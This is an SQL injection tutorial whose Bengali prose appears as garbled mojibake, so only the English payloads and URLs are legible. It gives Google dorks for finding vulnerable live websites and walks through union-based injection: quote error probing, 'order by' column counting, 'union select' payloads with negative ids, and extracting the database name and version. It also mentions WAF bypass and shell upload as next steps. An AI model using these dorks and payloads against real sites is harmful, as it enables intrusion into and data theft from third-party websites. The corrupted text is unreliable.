SQL INJECTION (Union Based SQLi)
āĻ¸āĻŦāĻžāĻ āĻāĻļāĻž āĻāĻ°āĻŋ āĻāĻžāĻ˛ā§ āĻāĻā§āĻ¨āĨ¤
(āĻāĻ āĻāĻŋāĻāĻā§āĻ°āĻŋā§āĻžāĻ˛āĻāĻŋ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻļāĻŋāĻā§āĻˇāĻ¨ā§ā§ āĻāĻĻā§āĻĻā§āĻ¯ā§āĻļā§āĻ¯ā§ āĻ˛ā§āĻāĻž āĻšā§ā§āĻā§)
āĻāĻāĻ¨ āĻĨā§āĻā§ āĻāĻŽāĻŋ SQL INJECTION āĻ¨āĻŋā§ā§ āĻ¨āĻŋā§āĻŽāĻŋāĻ¤ āĻāĻŋāĻāĻ¨ āĻ˛ā§āĻāĻžāĻ° āĻā§āĻˇā§āĻāĻž āĻāĻ°āĻŦā§āĨ¤
āĻāĻāĻā§ āĻāĻŽāĻŋ āĻāĻĒāĻ¨āĻžāĻĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻŦā§āĻ¸āĻŋāĻ āĻāĻāĻ¨āĻŋā§āĻ¨ āĻŦā§āĻāĻĄ SQL INJECTION
āĻāĻŋāĻāĻžāĻŦā§ āĻāĻ°āĻž āĻšā§ āĻ¸ā§āĻāĻž āĻĻā§āĻāĻžāĻŦā§āĨ¤
āĻāĻŦāĻ āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤ āĻāĻ˛ā§āĻāĻ¨āĻž āĻāĻ°āĻžāĻ° āĻā§āĻˇā§āĻāĻž āĻāĻ°āĻŦā§ āĻāĻļāĻž āĻāĻ°āĻŋ āĻ§ā§āĻ°ā§āĻ¯ āĻ¸āĻšāĻāĻžāĻ°ā§ āĻĒā§āĻŦā§āĻ¨āĨ¤
- SQL INJECTION āĻāĻŋ?
SQL INJECTION āĻšāĻā§āĻā§ āĻŦāĻ°ā§āĻ¤āĻŽāĻžāĻ¨ āĻ¸āĻŽā§ā§āĻ° āĻā§ā§āĻŦāĻ¸āĻžāĻāĻ āĻšā§āĻ¯āĻžāĻāĻŋāĻ āĻ¸āĻŦāĻā§ā§ā§ āĻāĻ¨āĻĒā§āĻ°āĻŋā§ āĻāĻŦāĻ
āĻāĻŽāĻ¨ āĻŽā§āĻĨāĻĄ/āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĨ¤
āĻāĻ¸āĻ˛ā§ SQL INJECTION āĻšāĻā§āĻā§ āĻ¤ā§āĻŽāĻ¨ āĻāĻ āĻŋāĻ¨ āĻāĻŋāĻ¨āĻŋāĻ¸ āĻ¨āĻž āĻ¤āĻŦā§
āĻāĻāĻž āĻāĻžāĻ˛ā§āĻāĻžāĻŦā§ āĻļāĻŋāĻāĻ¤ā§ āĻšāĻ˛ā§,
āĻāĻāĻžāĻ° āĻĒāĻŋāĻāĻ¨ā§ āĻāĻĒāĻ¨āĻžāĻ° āĻ
āĻ¨ā§āĻ āĻ¸āĻŽā§ āĻĻā§āĻā§āĻž āĻ˛āĻžāĻāĻŦā§āĨ¤
āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻšā§āĻ¯āĻžāĻāĻŋāĻ āĻ āĻ¨āĻ¤ā§āĻ¨ āĻāĻŽāĻ¨ āĻ
āĻ¨ā§āĻ Newbiee āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻŽāĻ¨ā§ āĻāĻ°ā§ āĻ¯ā§ SQL INJECTION āĻā§āĻ¨ā§ āĻŦāĻĄ āĻŦā§āĻ¯āĻžāĻĒāĻžāĻ° āĻ¨āĻžāĻš
āĻāĻžāĻ°āĻŖ āĻ¤āĻžāĻ°āĻž āĻā§āĻŦ āĻ¸āĻšāĻā§āĻ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻā§āĻ˛āĻ¸(Havij,Sqlmap,Sqlninja) āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ SQL INJECTION āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻāĻŋāĻ¨ā§āĻ¤ā§ SQL INJECTION āĻāĻŽāĻ¨ āĻāĻāĻāĻž āĻāĻŋāĻ¨āĻŋāĻ¸ āĻ¯ā§āĻāĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻĒāĻ¨āĻžāĻ° āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻļāĻŋāĻāĻ¤ā§ āĻšāĻ˛ā§ āĻ
āĻ¨ā§āĻ āĻŦāĻ āĻļā§āĻˇ āĻāĻ°āĻž āĻ˛āĻžāĻāĻŦā§
āĻāĻ° āĻŽāĻžāĻ¨ā§ āĻŦā§āĻāĻž āĻā§āĻ˛ā§ āĻ¯ā§ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻā§āĻ˛āĻ¸ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻĒāĻ¨āĻŋ āĻ
āĻ¨ā§āĻ āĻ¸āĻžāĻāĻ āĻāĻŋāĻ¨ā§āĻ¤ā§ SQL INJECTION āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨āĨ¤
āĻāĻŋāĻ¨ā§āĻ¤ā§ āĻ¤āĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻ¸āĻ˛ā§āĻ āĻā§āĻ¨ā§ āĻ˛āĻžāĻ āĻšāĻŦā§ āĻ¨āĻžāĨ¤
āĻāĻžāĻ°āĻŖ āĻāĻĒāĻ¨āĻŋ āĻāĻŋāĻā§āĻ āĻļāĻŋāĻāĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨ āĻ¨āĻžāĨ¤
āĻāĻŦāĻ āĻ
āĻ¨ā§āĻ āĻ¸āĻŽā§ āĻā§āĻ˛āĻ¸ āĻĻāĻŋā§ā§āĻ SQL INJECTION āĻāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻĻā§āĻ°ā§āĻŦāĻ˛/āĻā§āĻ˛āĻ¨āĻžāĻ°ā§āĻŦāĻ˛ āĻ¸āĻžāĻāĻ āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨ āĻ¨āĻžāĨ¤
āĻ¯āĻžā§ āĻšā§āĻāĨ¤
- SQL INJECTION āĻĻā§āĻŦāĻžāĻ°āĻž āĻāĻŋ āĻāĻŋ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨ āĻāĻĒāĻ¨āĻŋ?
- āĻāĻĒāĻ¨āĻŋ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§ āĻ¤āĻĨā§āĻ¯ āĻ¤ā§ āĻāĻā§āĻ¸ā§āĻ¸ āĻ¨āĻŋāĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨āĨ¤
- āĻāĻĒāĻ¨āĻŋ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻ¤āĻĨā§āĻ¯ āĻŽā§āĻĄāĻŋāĻĢāĻžāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨āĨ¤
- āĻāĻĒāĻ¨āĻŋ āĻ¸āĻžāĻāĻā§āĻ° āĻ˛āĻāĻāĻ¨ āĻāĻ°āĻŋā§āĻž āĻŦāĻžāĻāĻĒāĻžāĻ¸ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨āĨ¤
- āĻāĻĒāĻ¨āĻŋ SQL Server āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĻ¨āĨ¤
āĻ¤āĻžāĻšāĻ˛ā§ āĻļā§āĻ°ā§ āĻāĻ°āĻž āĻ¯āĻžāĻāĨ¤
āĻĒā§āĻ°āĻĨāĻŽāĻ¤ āĻāĻŽāĻžāĻĻā§āĻ° SQL INJECTION āĻāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻāĻ āĻŦā§āĻ° āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤
āĻ¯āĻĻāĻŋ āĻāĻĒāĻ¨āĻŋ āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻšāĻ¨,āĻ¤āĻžāĻšāĻ˛ā§ āĻāĻĒāĻ¨āĻŋ āĻāĻžāĻ˛ā§ āĻāĻ°ā§āĻ āĻāĻžāĻ¨āĻŦā§āĻ¨ āĻ¯ā§ āĻ¸āĻžāĻ°ā§āĻ āĻāĻā§āĻāĻŋāĻ¨ āĻšāĻ˛ā§ āĻšā§āĻ¯āĻžāĻāĻžāĻ°āĻĻā§āĻ°
āĻ¸āĻŦāĻā§ā§ā§ āĻŦā§āĻ¸ā§āĻ āĻĢā§āĻ°ā§āĻ¨ā§āĻĄāĨ¤āĻāĻŽāĻ°āĻž SQL INJECTION āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻāĻ GOOGLE Dork
āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻŦā§āĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĨ¤
āĻ¨āĻŋāĻā§ āĻāĻŽāĻŋ āĻāĻŋāĻā§ āĻāĻŽāĻ¨ SQL INJECTION Dork āĻĻāĻŋāĻā§āĻāĻŋāĻ
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
Dork āĻāĻ°ā§ āĻ
āĻ¨ā§āĻ āĻŦāĻĄ āĻŦāĻŋāĻļāĻžāĻ˛ āĻ˛āĻŋāĻ¸ā§āĻ āĻāĻā§āĨ¤ āĻĒāĻ°ā§ āĻā§āĻ¨ā§ āĻāĻ āĻ¸āĻŽā§ āĻļā§ā§āĻžāĻ° āĻāĻ°āĻŦā§āĨ¤
āĻ
āĻĨāĻŦāĻž āĻāĻĒāĻ¨āĻŋ āĻā§āĻāĻ˛ āĻĨā§āĻā§ āĻ¸āĻžāĻ°ā§āĻ āĻāĻ°ā§ āĻŦā§āĻ° āĻāĻ°ā§ āĻ¨āĻŋāĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨āĨ¤
āĻāĻāĻ¨ āĻāĻĒāĻ¨āĻŋ āĻāĻāĻžāĻ¨ āĻĨā§āĻā§ āĻ¯ā§āĻā§āĻ¨ā§ āĻāĻāĻāĻŋ Dork āĻ¨āĻŋā§ā§ āĻā§āĻāĻ˛ā§ āĻ¸āĻžāĻ°ā§āĻ āĻĻāĻŋāĻ˛ā§
āĻ°ā§āĻ¸āĻžāĻ˛ā§āĻā§ āĻ
āĻ¨ā§āĻ āĻ¸āĻžāĻāĻ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĻ¨āĨ¤
āĻ¸ā§āĻāĻžāĻ¨ āĻĨā§āĻā§ āĻ¯ā§āĻā§āĻ¨ā§ āĻāĻāĻāĻŋ āĻ¸āĻžāĻāĻā§ āĻĒā§āĻ°āĻŦā§āĻļ āĻāĻ°ā§āĻ¨āĨ¤
āĻŽāĻ¨ā§ āĻāĻ°ā§āĻ¨ āĻāĻ°āĻāĻŽ āĻāĻāĻāĻŋ āĻ¸āĻžāĻāĻ āĻĒā§āĻ˛ā§āĻ¨ āĻāĻĒāĻ¨āĻŋ (āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖ)
website.com/index.php?id=1
āĻāĻ āĻāĻāĻāĻ°āĻāĻ˛ āĻāĻŋ āĻ
āĻ¨ā§āĻ āĻ°āĻāĻŽā§āĻ° āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻ¤āĻŦā§ āĻāĻŽāĻŋ āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖā§āĻ° āĻāĻ¨ā§āĻ¯ā§ āĻāĻāĻŋ āĻĻā§āĻāĻžāĻ˛āĻžāĻŽāĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻā§āĻ¸ā§āĻ āĻāĻ°āĻŦā§ āĻ¸āĻžāĻāĻāĻāĻŋ SQL INJECTION āĻā§āĻ˛āĻ¨āĻ°āĻžāĻŦāĻ˛ āĻāĻŋāĻ¨āĻžāĨ¤
āĻ¤āĻžāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻāĻŽāĻŋ āĻ¸āĻžāĻāĻā§āĻ° āĻļā§āĻˇā§ āĻāĻ (') āĻāĻŋāĻšā§āĻ¨āĻāĻŋ āĻĻāĻŋāĻŦā§ (āĻŦā§āĻ°āĻžāĻā§āĻā§āĻ° āĻŽāĻžāĻāĻāĻžāĻ¨ā§āĻ° āĻāĻŋāĻšā§āĻ¨āĻāĻŋ)
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
website.com/index.php?id=1'
āĻāĻāĻ¨ āĻ¯āĻĻāĻŋ āĻ¸āĻžāĻāĻāĻŋ SQL INJECTION āĻāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻšā§ āĻ¤āĻžāĻšāĻ˛ā§
āĻāĻĒāĻ¨āĻŋ āĻāĻ°āĻāĻŽ āĻāĻŋāĻā§ āĻāĻ°āĻ° āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĻ¨āĨ¤
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
āĻ
āĻĨāĻŦāĻž,
Warning: mysql_fetch_array()
āĻ
āĻĨāĻŦāĻž āĻāĻĒāĻ¨āĻŋ āĻ¯āĻĻāĻŋ āĻā§āĻ¨ā§ āĻ°āĻāĻŽā§āĻ° mysql āĻāĻ°āĻ° āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ¨āĨ¤
āĻ
āĻĨāĻŦāĻž āĻ¯āĻĻāĻŋ āĻ¸ā§āĻ āĻā§ā§āĻŦ āĻĒā§āĻāĻ āĻĨā§āĻā§ āĻā§āĻ¨ā§ āĻĄāĻžāĻāĻž āĻŽāĻŋāĻ¸ āĻāĻ°ā§ āĻ¤āĻžāĻšāĻ˛ā§ āĻŦā§āĻāĻ¤ā§ āĻšāĻŦā§
āĻ¸āĻžāĻāĻāĻāĻŋ SQL INJECTION āĻā§āĻ˛āĻ¨āĻ°āĻžāĻŦāĻ˛āĨ¤
āĻ¯āĻĻāĻŋ āĻāĻ¸āĻŦā§āĻ° āĻāĻŋāĻā§ āĻ¨āĻž āĻšā§ āĻ¤āĻžāĻšāĻ˛ā§ āĻ¸āĻžāĻāĻāĻāĻŋ āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¨āĻžāĻš!
āĻ
āĻ¨ā§āĻ¯ āĻāĻ°ā§āĻāĻāĻŋ āĻ¸āĻžāĻāĻ āĻā§āĻā§āĻ¨āĨ¤
āĻāĻ°āĻ° āĻĒāĻžāĻā§āĻžāĻ° āĻĒāĻ°ā§ āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ āĻšāĻŦā§ āĻ¸āĻžāĻāĻāĻāĻŋ āĻāĻŋ āĻāĻā§āĻ¸āĻĒā§āĻ˛āĻāĻāĻŋāĻ āĻāĻ°āĻžāĻ° āĨ¤
āĻŽāĻžāĻ¨ā§ SQL INJECTION āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤
āĻāĻŽāĻ°āĻž āĻāĻ¤āĻā§āĻˇāĻ¨ āĻā§āĻ˛āĻ¨āĻžāĻ°āĻŦāĻ˛ āĻ¸āĻžāĻāĻ āĻŦā§āĻ° āĻāĻ°āĻ˛āĻžāĻŽ,āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ āĻšāĻŦā§ āĻ¸āĻžāĻāĻāĻāĻŋ āĻĨā§āĻā§ āĻĄāĻžāĻāĻž
āĻĄāĻžāĻŽā§āĻĒ āĻāĻ°āĻž āĻŦāĻž āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻžāĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻĒāĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻĒāĻĻāĻā§āĻˇā§āĻĒ āĻšāĻŦā§ āĻāĻ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻā§āĻŦāĻŋāĻ˛ā§ āĻāĻ˛āĻžāĻŽā§āĻ° āĻ¸āĻāĻā§āĻ¯āĻž āĻāĻ¤ā§ āĻ¸ā§āĻāĻž āĻŦā§āĻ° āĻāĻ°āĻžāĨ¤
āĻ¸ā§āĻāĻ¨ā§āĻ¯ā§ āĻāĻŽāĻ°āĻž ' āĻāĻŋāĻšā§āĻ¨ āĻāĻŋ order by statement āĻ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°āĻŦā§āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--
āĻāĻŽāĻžāĻĻā§āĻ° order by āĻāĻ° āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻāĻŋ āĻŦāĻžāĻĄāĻŋā§ā§ āĻ¯ā§āĻ¤ā§ āĻšāĻŦā§ āĻ¯āĻ¤āĻā§āĻˇāĻ¨ āĻ¨āĻž āĻāĻŽāĻ°āĻž
āĻ¸āĻžāĻāĻāĻāĻŋ āĻ¤ā§ āĻā§āĻ¨ā§ āĻāĻ°āĻ° āĻĻā§āĻāĻ¤ā§ āĻ¨āĻž āĻĒāĻžā§āĨ¤
āĻāĻ°āĻ° āĻ
āĻ¨ā§āĻāĻāĻž āĻāĻ°āĻāĻŽ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§,
unknown column numbers
āĻ
āĻĨāĻŦāĻž
āĻ¸āĻžāĻāĻā§āĻ° āĻāĻŋāĻā§ āĻĄāĻžāĻāĻž āĻŽāĻŋāĻ¸ āĻšāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR āĻ¸āĻžāĻāĻā§āĻ° āĻāĻ¨āĻā§āĻ¨ā§āĻ āĻŽāĻŋāĻ¸ āĻšāĻā§āĻā§āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻžāĻ°āĻž order by 21 āĻĒāĻ°ā§āĻ¯āĻ¨ā§āĻ¤ āĻāĻ¸āĻžāĻ° āĻĒāĻ° error āĻĻā§āĻāĻ¤ā§ āĻĒā§āĻ˛āĻžāĻŽāĨ¤
āĻāĻŋāĻ¨ā§āĻ¤ā§ order by 20 āĻĻāĻŋāĻ˛ā§ āĻā§āĻ¨ā§ āĻāĻ°āĻ° āĻ¨ā§āĻāĨ¤
āĻ¤āĻžāĻ° āĻŽāĻžāĻ¨ā§ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§ ā§¨ā§Ļ āĻāĻŋ āĻāĻ˛āĻžāĻŽ āĻāĻā§āĨ¤
āĻ
āĻ¨ā§āĻ āĻ¸āĻŽā§ order by 1000 āĻĻāĻŋāĻ˛ā§āĻ āĻāĻ°āĻ° āĻāĻ¸ā§ āĻ¨āĻžāĻšāĨ¤
āĻ¸ā§ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ id / parameter āĻāĻ° āĻļā§āĻˇā§ ' āĻāĻŋāĻšā§āĻ¨ āĻāĻŋ āĻĻāĻŋāĻ¤ā§ āĻšā§
āĻāĻŦāĻ āĻļā§āĻˇā§ āĻāĻāĻāĻŋ + āĻ¯ā§āĻ āĻāĻ°āĻ¤ā§ āĻšā§āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+
āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ¨āĻž āĻāĻā§ āĻ¯ā§ āĻāĻ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§ ā§¨ā§ĻāĻāĻŋ āĻāĻ˛āĻžāĻŽ āĻāĻā§āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ āĻšāĻŦā§ āĻ¸āĻŦ āĻāĻ˛āĻžāĻŽ āĻ¸āĻŋāĻ˛ā§āĻā§āĻ āĻāĻ°āĻž union select statement āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤
select statement āĻāĻŋ Data āĻĻā§āĻāĻžāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻšā§āĨ¤
āĻ¯āĻžā§ āĻšā§āĻ āĻāĻ° āĻĒāĻ°ā§āĻ¯āĻžā§ā§ āĻāĻŽāĻ°āĻž āĻāĻ āĻā§āĻĄāĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§āĨ¤
http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
āĻāĻāĻ¨ āĻāĻŽāĻ°āĻž āĻā§ā§āĻŦ āĻĒā§āĻāĻā§ āĻāĻŋāĻā§ āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĨ¤
āĻ¨āĻŽā§āĻŦāĻ° āĻā§āĻ˛ā§ ā§§-ā§¨ā§Ļ āĻāĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻšāĻŦā§ āĻāĻžāĻ°āĻŖ āĻāĻŽāĻ°āĻž āĻāĻžāĻ¨āĻŋ āĻāĻ āĻ¸āĻžāĻāĻā§āĻ° āĻāĻ˛āĻžāĻŽ ā§¨ā§Ļ āĻāĻŋāĨ¤
āĻāĻ° āĻāĻŽāĻ°āĻž āĻ¯ā§ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋ āĻ¸ā§āĻāĻž āĻĻāĻŋā§ā§ ā§¨ā§ĻāĻāĻŋ āĻāĻ˛āĻžāĻŽā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻā§āĻ¨āĻāĻŋ
String āĻāĻ˛āĻžāĻŽ āĻ¸ā§āĻāĻž āĻŦā§āĻ° āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ā§ āĻāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋāĨ¤
āĻ¯āĻĻāĻŋ āĻāĻĒāĻ¨āĻŋ āĻā§āĻ¨ā§ āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻĻā§āĻāĻ¤ā§ āĻ¨āĻž āĻĒāĻžāĻ¨ āĻ¤āĻžāĻšāĻ˛ā§
parameter value āĻāĻ° āĻāĻā§ āĻāĻāĻāĻŋ - āĻāĻŋāĻšā§āĻ¨ āĻĻā§āĻ¨āĨ¤
āĻāĻĻāĻžāĻšāĻžāĻ°āĻŖāĻ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
āĻāĻĒāĻ¨āĻŋ āĻā§ā§āĻŦāĻĒā§āĻāĻā§ āĻāĻŋāĻā§ āĻ¨āĻžāĻŽā§āĻŦāĻžāĻ° āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĻ¨āĨ¤
āĻāĻŽāĻŋ ā§Š,ā§Ē āĻĻā§āĻāĻ¤ā§ āĻĒā§āĻ˛āĻžāĻŽāĨ¤
āĻāĻ āĻĻā§āĻāĻāĻž āĻšāĻ˛ā§ String Column āĻāĻŽāĻ°āĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĨā§āĻā§ āĻ¤āĻĨā§āĻ¯ āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§
āĻāĻ āĻĻā§āĻāĻāĻŋ āĻāĻ˛āĻžāĻŽ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤
āĻ
āĻ¨ā§āĻ āĻ¸āĻŽā§ āĻāĻĒāĻ°ā§ āĻ¯ā§ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻ¨āĻŋā§ā§ āĻ˛ā§āĻā§āĻāĻŋ āĻ¸ā§āĻāĻž āĻāĻžāĻ āĻāĻ°ā§ āĻ¨āĻžāĻš
āĻ¸ā§ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ āĻāĻŽāĻ°āĻž āĻāĻ°āĻ° āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦā§āĨ¤
āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ waf bypass āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤
āĻ¸ā§āĻāĻž āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ¸āĻžāĻŽāĻ¨ā§āĻ° āĻāĻŋāĻāĻā§āĻ°āĻŋā§āĻžāĻ˛ āĻā§āĻ˛ā§āĻ¤ā§ āĻāĻ˛ā§āĻāĻ¨āĻž āĻāĻ°āĻŦā§āĨ¤
āĻāĻāĻ¨ āĻāĻŽāĻžāĻĻā§āĻ° āĻāĻžāĻ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻĨā§āĻā§ āĻĄāĻžāĻāĻž āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻžāĨ¤
āĻāĻŽāĻ°āĻž āĻāĻāĻ¨ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻ¸āĻāĻ°āĻā§āĻˇāĻŋāĻ¤ āĻā§āĻĒāĻ¨ āĻĄāĻžāĻāĻž āĻā§āĻ˛ā§ āĻšā§āĻ¯āĻžāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĨ¤
āĻāĻāĻžāĻĄāĻžāĻ āĻāĻŽāĻ°āĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ā§āĻ° āĻ¨āĻžāĻŽ database() āĻāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§,
āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻāĻžāĻ°ā§āĻ¸āĻ¨ āĻāĻžāĻ¨āĻ¤ā§ version() āĻāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻŦā§āĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§āĨ¤
āĻāĻāĻžāĻĄāĻžāĻ āĻāĻŽāĻ°āĻž SQL INJECTION āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ˛ā§āĻĄ āĻĢāĻžāĻāĻ˛ āĻŽā§āĻĨāĻĄ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§
āĻā§āĻ˛āĻ¨āĻ°āĻžāĻŦāĻ˛ āĻ¸āĻžāĻāĻā§ āĻļā§āĻ˛ āĻāĻĒāĻ˛ā§āĻĄ āĻĻāĻŋāĻ¤ā§ āĻĒāĻžāĻ°āĻŦā§ (āĻāĻ āĻŦāĻŋāĻˇā§ā§ āĻĒāĻ°ā§ āĻāĻŋāĻāĻā§āĻ°āĻŋā§āĻžāĻ˛ āĻ˛ā§āĻāĻž āĻšāĻŦā§)
āĻāĻ āĻāĻŋāĻāĻā§āĻ°āĻŋā§āĻžāĻ˛ āĻāĻŋ āĻ¤ā§ āĻāĻŽāĻ°āĻž āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻāĻāĻāĻžāĻ° āĻ¨ā§āĻŽ āĻāĻŦāĻ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻāĻžāĻ°ā§āĻ¸āĻ¨ āĻŦā§āĻ° āĻāĻ°āĻŦā§,
ā§Š āĻāĻŦāĻ ā§Ē āĻ¨āĻŽā§āĻŦāĻ° String āĻāĻ˛āĻžāĻŽ āĻŦā§āĻ¯āĻžāĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤
